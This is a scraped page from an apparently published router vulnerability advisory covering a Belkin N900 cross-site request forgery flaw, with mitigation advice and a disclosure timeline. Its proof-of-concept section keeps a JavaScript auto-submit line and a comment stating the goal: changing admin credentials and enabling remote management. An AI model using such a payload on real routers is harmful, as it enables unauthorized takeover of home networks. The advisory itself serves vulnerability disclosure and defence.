ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors<br />
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ Restrict access to WAN services such as remote management to prevent an<br />
attacker from gaining access if an attack is successful.<br />
Proof of Concept Exploit<br />
If the following request is sent to the router, it will change the configuration settings<br />
without authentication.<br />
/*Change Password and Enable Remote Management on Port 31337*/<br />
<br />
<br />
Belkin N900 CSRF -‐ Change Admin Creds. and Enable Remote MGMT. <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
function BeLkIn() {document.belkinN900.submit();}; window.setTimeout(BeLkIn, 0000); <br />
<br />
<br />
<br />
Disclosure Timeline<br />
♦ 2/11/2013 - Notified Belkin<br />
♦ 4/15/2013 - Public Disclosure<br />
<br />
67